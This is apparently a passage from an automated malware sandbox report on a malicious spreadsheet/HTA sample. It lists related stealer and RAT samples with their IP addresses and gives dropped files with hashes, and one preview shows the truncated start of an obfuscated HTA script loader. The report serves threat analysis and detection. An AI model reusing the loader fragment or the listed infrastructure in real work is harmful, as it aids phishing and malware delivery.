                                                                                                                                                                                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • 172.67.154.67
                                                                                                                                                                                                                  CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar, WhiteSnake StealerBrowse
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, WhiteSnake StealerBrowse
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                  • 188.114.97.3
                                                                                                                                                                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 188.114.96.3
                                                                                                                                                                                                                  Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                  • 172.67.154.67
                                                                                                                                                                                                                  AS-COLOCROSSINGUShttp://xn--gba7iaacaabba0ab51nca04ecacdad9203oearjjb191bfa.mkto-sj030022.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.96.254
                                                                                                                                                                                                                  greatthingswithmegood.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                                                                                                                  • 198.46.178.151
                                                                                                                                                                                                                  Orden de Compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.220.20
                                                                                                                                                                                                                  PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 198.46.178.151
                                                                                                                                                                                                                  Orden de compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.220.20
                                                                                                                                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.101.8
                                                                                                                                                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 198.46.178.151
                                                                                                                                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.101.8
                                                                                                                                                                                                                  SuNMTBkfPo.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.245.26.231
                                                                                                                                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.101.8
                                                                                                                                                                                                                  AS-COLOCROSSINGUShttp://xn--gba7iaacaabba0ab51nca04ecacdad9203oearjjb191bfa.mkto-sj030022.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.96.254
                                                                                                                                                                                                                  greatthingswithmegood.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                                                                                                                  • 198.46.178.151
                                                                                                                                                                                                                  Orden de Compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.220.20
                                                                                                                                                                                                                  PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 198.46.178.151
                                                                                                                                                                                                                  Orden de compra.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.220.20
                                                                                                                                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.101.8
                                                                                                                                                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 198.46.178.151
                                                                                                                                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.101.8
                                                                                                                                                                                                                  SuNMTBkfPo.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.245.26.231
                                                                                                                                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 192.3.101.8
                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                  05af1f5ca1b87cc9cc9b25185115607dna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                  • 142.250.184.206
                                                                                                                                                                                                                  • 172.217.16.193
                                                                                                                                                                                                                  • 142.250.185.65
                                                                                                                                                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                  • 142.250.184.206
                                                                                                                                                                                                                  • 172.217.16.193
                                                                                                                                                                                                                  • 142.250.185.65
                                                                                                                                                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                  • 142.250.184.206
                                                                                                                                                                                                                  • 172.217.16.193
                                                                                                                                                                                                                  • 142.250.185.65
                                                                                                                                                                                                                  na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                  • 142.250.184.206
                                                                                                                                                                                                                  • 172.217.16.193
                                                                                                                                                                                                                  • 142.250.185.65
                                                                                                                                                                                                                  PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 142.250.184.206
                                                                                                                                                                                                                  • 172.217.16.193
                                                                                                                                                                                                                  • 142.250.185.65
                                                                                                                                                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 142.250.184.206
                                                                                                                                                                                                                  • 172.217.16.193
                                                                                                                                                                                                                  • 142.250.185.65
                                                                                                                                                                                                                  Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                  • 142.250.184.206
                                                                                                                                                                                                                  • 172.217.16.193
                                                                                                                                                                                                                  • 142.250.185.65
                                                                                                                                                                                                                  AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 142.250.184.206
                                                                                                                                                                                                                  • 172.217.16.193
                                                                                                                                                                                                                  • 142.250.185.65
                                                                                                                                                                                                                  0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 142.250.184.206
                                                                                                                                                                                                                  • 172.217.16.193
                                                                                                                                                                                                                  • 142.250.185.65
                                                                                                                                                                                                                  1.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 142.250.184.206
                                                                                                                                                                                                                  • 172.217.16.193
                                                                                                                                                                                                                  • 142.250.185.65
                                                                                                                                                                                                                  7dcce5b76c8b17472d024758970a406bweekly-finances-report.xlsxGet hashmaliciousKnowBe4Browse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  AWB-M09CT560.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  NUEVA ORDEN DE COMPRA 73244.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  0001.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  Swift Copy.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                                                                                                                                  • 172.67.162.95
                                                                                                                                                                                                                  • 104.21.74.191
                                                                                                                                                                                                                  No context
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4742
                                                                                                                                                                                                                  Entropy (8bit):4.8105940880640246
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                                                                                                                                                  MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                                                                                                                                                  SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                                                                                                                                                  SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                                                                                                                                                  SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                                                  Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:@...e...........................................................
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                  Size (bytes):210838
                                                                                                                                                                                                                  Entropy (8bit):2.2136256780619434
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:43F1e81W1Hx81WBHNc4X24hH81Wo81WwHCU81WXQ:2F1e812x81qNc4XLd81Z81dCU81R
                                                                                                                                                                                                                  MD5:9F7246F010B3A5F0AF7916AE221C0542
                                                                                                                                                                                                                  SHA1:25AA19553540725FCE3C73170A47F6941BBE1BDD
                                                                                                                                                                                                                  SHA-256:6D89514EBEA3915078EA273BCE9BB236F72CF36095E6688DF0B9A3A645F22AB1
                                                                                                                                                                                                                  SHA-512:894F5AF64CC08516743766C843575790485396C3374B6E3365E3DCDBCDB35293BACCE62DFDBA4EC7596D75823298A67BC6CC6B9D789D632C1252401009C8B5F2
                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                  • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].hta, Author: Joe Security
                                                                                                                                                                                                                  Preview:<script language=JavaScript>m='%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%252520language%25253DJavaScript%25253Em%25253D%252527%2525253Cscript%2525253E%2525250A%2525253C%25252521--%2525250Adocument.write%25252528unescape%25252528%25252522%252525253C%2525252521DOCTYPE%2525252520html%252525253E%252525250A%252525253Cmeta%2525252520http-equiv%252525253D%2525252522X-UA-Compatible%2525252522%2525252520content%252525253D%2525252522IE%252525253DEmulateIE8%2525252522%2525252520%252525253E%252525250A%252525253Chtml%252525253E%252525250A%252525253Cbody%252525253E%252525250A%252525253CScript%2525252520LANGUAge%252525253D%2525252522VbscRIpT%2525252522%252525253E%252525250AdIM%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%2525252509%25252525
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):142374
                                                                                                                                                                                                                  Entropy (8bit):3.677260536494028
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:WKj6gt5pyGwgKAsMA/ywdctlIG6ZIrXEFlI:YAsMAawdV2zMlI
                                                                                                                                                                                                                  MD5:56B6F31B8CD3BA627DEEBA14CCA18DE8
                                                                                                                                                                                                                  SHA1:16CEA6537A5E76140939C4514E90DAB9E85787FE
                                                                                                                                                                                                                  SHA-256:0F0E3EADB94941689F2A80003A1401274075759ECB2837129EAE3CF37BF724FB
                                                                                                                                                                                                                  SHA-512:B1B70CA9F8E091038EBC925634E96F0BA4E701713A6A0A4957A9C889055C66EF6E3A49C9832C63A55441A3C5AA464617C4EFB105BF1C2FCC587EA16BF268E175
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .a.l.l.o.c.h.i.r.i.a.)..... . . . .d.i.m. .g.a.l.h.a.r.d.a.m.e.n.t.e.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .g.a.l.h.a.r.d.a.m.e.n.t.e..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .g.a.l.h.a.r.d.a.m.e.n.t.e.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.
                                                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):957
                                                                                                                                                                                                                  Entropy (8bit):5.007783152825393
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q/dVauKyGX85jHf3SvXhNlT3/7YvfbYro:Oba0GX85mvhjTkvfEro
                                                                                                                                                                                                                  MD5:0CB0F94F254896E3B02821BF79268CEC
                                                                                                                                                                                                                  SHA1:DC0EB40C0C93E97DE3B5D1B83FA372858301BC41
                                                                                                                                                                                                                  SHA-256:68430F15070A53EE3EE96EC44ED92D620B9AF3DE211624C96F94FFEF5DCA3916
                                                                                                                                                                                                                  SHA-512:866F769ACF19442688E3C8DE1E960169F38CA67C60A719FBD9DED0AEBF0B396AFD54CC78C519342AB5B6D1A332E7287466155CE9A21964DA7F814CDA43C42E49
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:{. "geoplugin_request":"173.254.250.77",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):313912
                                                                                                                                                                                                                  Entropy (8bit):2.990286633990328
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:GgUaa/2eDqEsv3Iid/aQGb1BfUErpxTORWEl+LtORUH+Rqg6BIg+kA7X5:GgUEEsjd/adDrvTUzUH+T6r+kO5
                                                                                                                                                                                                                  MD5:DF35BBD78C48F711FC1CF95F65C51E03
                                                                                                                                                                                                                  SHA1:A12873DC03B00CCAD023EF993139DF2B6AB15C4D
                                                                                                                                                                                                                  SHA-256:692617F0F2226E11FB5DAD2102E0C506FFF63DDDA0646CB7F63965548276493B
                                                                                                                                                                                                                  SHA-512:FE04C161C044D9178C9A028F227110DC92D6D07693BE209075A3768886DBEB8F209A8AF50CC2E899DC6B364F8EBAE6DB02451F3ADDB8AD6BDF85468C78684DD8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l...........................6[...%.. EMF....8...............................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......1.......Z.......1.......*...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4548484
                                                                                                                                                                                                                  Entropy (8bit):3.5983684802509543
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:x0IivajYI2qoWfceTyPYI2qMWPXFucI1/gGoJRNRCIY5fgmom:Ia0I2qoW1ygI2qMWzIpgGoZY9gmom
                                                                                                                                                                                                                  MD5:75F7043A255C6B9CF5293E4298ED5B1C
                                                                                                                                                                                                                  SHA1:CB4BF68466ECDACE7C1FEDC8D01169A80381C49D
                                                                                                                                                                                                                  SHA-256:9959002E0E67D70E08CB7A9226D1824D77FFD8CA4AB9904233B717E8EB3FEF27
                                                                                                                                                                                                                  SHA-512:19C26274073F02E6A8E19BD7E7F5AA010EC2EA538516FD699B181F8D4CE6CA3F9AA8303E3B5C4BC5B05CDA3ED93CE1BA2E5CCAED8150803F3871E8D68B5CCFDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l...........v................S...".. EMF.....gE.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):312844
                                                                                                                                                                                                                  Entropy (8bit):3.073616793343093
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:g7YN86DqE7v3Iid/aQGb1BfUErpxTORWEl+v86cLUI+O9LI6drUk54:g7q8/E7jd/adDrvTUrUI+OJdrZ4
                                                                                                                                                                                                                  MD5:2EFA3D5F23ED43B57DFD93FC588D2612
                                                                                                                                                                                                                  SHA1:21B7A75CE29B29F6FE5968F08DCED7AC32F35F1D
                                                                                                                                                                                                                  SHA-256:78299B94D14E37DD3B7E2B0457C3EA35B08FFD269C7E03886007D390650F8D23
                                                                                                                                                                                                                  SHA-512:BA103CE75EEBCFEFD35B0187636DEB18CB2BE3EC61D4533B4E02F0271438A2C49154C644D504571CEE3C7EE401F1A1418BB2CE1CD4A1912D8857620E7CA39184
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l............................S...".. EMF............-...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4548484
                                                                                                                                                                                                                  Entropy (8bit):3.5983684802509543
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:6144:x0IivajYI2qoWfceTyPYI2qMWPXFucI1/gGoJRNRCIY5fgmom:Ia0I2qoW1ygI2qMWzIpgGoZY9gmom
                                                                                                                                                                                                                  MD5:75F7043A255C6B9CF5293E4298ED5B1C
                                                                                                                                                                                                                  SHA1:CB4BF68466ECDACE7C1FEDC8D01169A80381C49D
                                                                                                                                                                                                                  SHA-256:9959002E0E67D70E08CB7A9226D1824D77FFD8CA4AB9904233B717E8EB3FEF27
                                                                                                                                                                                                                  SHA-512:19C26274073F02E6A8E19BD7E7F5AA010EC2EA538516FD699B181F8D4CE6CA3F9AA8303E3B5C4BC5B05CDA3ED93CE1BA2E5CCAED8150803F3871E8D68B5CCFDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l...........v................S...".. EMF.....gE.........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................
                                                                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):172076
                                                                                                                                                                                                                  Entropy (8bit):3.1342558498505824
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
                                                                                                                                                                                                                  MD5:D85DAC1376E45C58F790BD50C2729F6C
                                                                                                                                                                                                                  SHA1:5BD339C54A944689935652E4A1CC78961EB19589
                                                                                                                                                                                                                  SHA-256:CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
                                                                                                                                                                                                                  SHA-512:6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......
                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3:U:U
                                                                                                                                                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:1
